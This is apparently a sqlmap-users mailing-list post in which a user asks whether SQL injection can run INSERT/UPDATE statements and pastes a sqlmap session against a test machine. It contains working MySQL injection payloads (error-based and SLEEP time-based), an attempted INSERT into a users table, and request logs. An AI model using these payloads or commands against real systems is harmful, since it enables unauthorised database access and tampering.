[sqlmap-users] insert via injection

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi,

is it possible to make "insert/update" queries via sql injection bugs?

I tried at my test machine via "--sql-query", but i didn't see query in
request_uri:

(admin@rpmbuild)-(09:03 PM Tue Apr 26)-(~/sqlmap-dev)
$ python26 sqlmap.py -u "10.0.0.60/sql/user.php?id=1" -t t3.log
--sql-query="insert into users set user='aaa',pass='bbb';"

    sqlmap/1.0-dev (r3809) - automatic SQL injection and database takeover
tool
    http://sqlmap.sourceforge.net

[*] starting at: 21:07:53

[21:07:53] [INFO] using '/home/admin/sqlmap-dev/output/10.0.0.60/session' as
session file
[21:07:53] [INFO] resuming injection data from session file
[21:07:53] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[21:07:53] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND (SELECT 1212 FROM(SELECT
COUNT(*),CONCAT(CHAR(58,110,118,103,58),(SELECT (CASE WHEN (1212=1212) THEN
1 ELSE 0 END)),CHAR(58,117,118,99,58),FLOOR(RAND(0)*2))x FROM
information_schema.tables GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[21:07:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
do you want to retrieve the SQL statement output? [Y/n/a]
[21:07:54] [INFO] fetching SQL data manipulation query output: 'insert into
users set user='aaa',pass='bbb';'
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
[21:07:54] [INFO] read from file '/home/admin/sqlmap-dev/output/
10.0.0.60/session': None
insert into users set user='aaa',pass='bbb'; [2]:
[*] None

[21:07:54] [INFO] Fetched data logged to text files under
'/home/admin/sqlmap-dev/output/10.0.0.60'

[*] shutting down at: 21:07:54

(admin@rpmbuild)-(09:07 PM Tue Apr 26)-(~/sqlmap-dev)
$ cat t3.log
HTTP request [#1]:
GET /sql/user.php?id=1 HTTP/1.1
Accept-Encoding: identity
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: 10.0.0.60
Accept-language: en-us,en;q=0.5
Pragma: no-cache
Cache-control: no-cache,no-store
User-agent: sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
Connection: close

HTTP response [#1] (200 OK):
Content-length: 949
X-powered-by: PHP/5.1.6
Uri: http://10.0.0.60:80/sql/user.php?id=1
Server: Apache/2.2.3 (CentOS)
Connection: close
Date: Tue, 26 Apr 2011 19:07:53 GMT
Content-type: text/html; charset=UTF-8

HTTP_ACCEPT_ENCODING => identity
HTTP_ACCEPT_LANGUAGE => en-us,en;q=0.5
HTTP_CONNECTION => close
HTTP_USER_AGENT => sqlmap/1.0-dev (r3809) (http://sqlmap.sourceforge.net)
HTTP_ACCEPT_CHARSET => ISO-8859-15,utf-8;q=0.7,*;q=0.7
HTTP_HOST => 10.0.0.60
HTTP_PRAGMA => no-cache
HTTP_CACHE_CONTROL => no-cache,no-store
PATH => /sbin:/usr/sbin:/bin:/usr/bin
SERVER_SIGNATURE => <address>Apache/2.2.3 (CentOS) Server at 10.0.0.60 Port
80</address>

SERVER_SOFTWARE => Apache/2.2.3 (CentOS)
SERVER_NAME => 10.0.0.60
SERVER_ADDR => 10.0.0.60
SERVER_PORT => 80
REMOTE_ADDR => 10.0.0.60
DOCUMENT_ROOT => /var/www/html
SERVER_ADMIN => root@localhost
SCRIPT_FILENAME => /var/www/html/sql/user.php
REMOTE_PORT => 41083
GATEWAY_INTERFACE => CGI/1.1
SERVER_PROTOCOL => HTTP/1.1
REQUEST_METHOD => GET
QUERY_STRING => id=1
REQUEST_URI => /sql/user.php?id=1
SCRIPT_NAME => /sql/user.php
PHP_SELF => /sql/user.php
REQUEST_TIME => 1303844873
ok

############################################################################

-- 
Kirill Morozov
KIMO2-RIPE, RHCE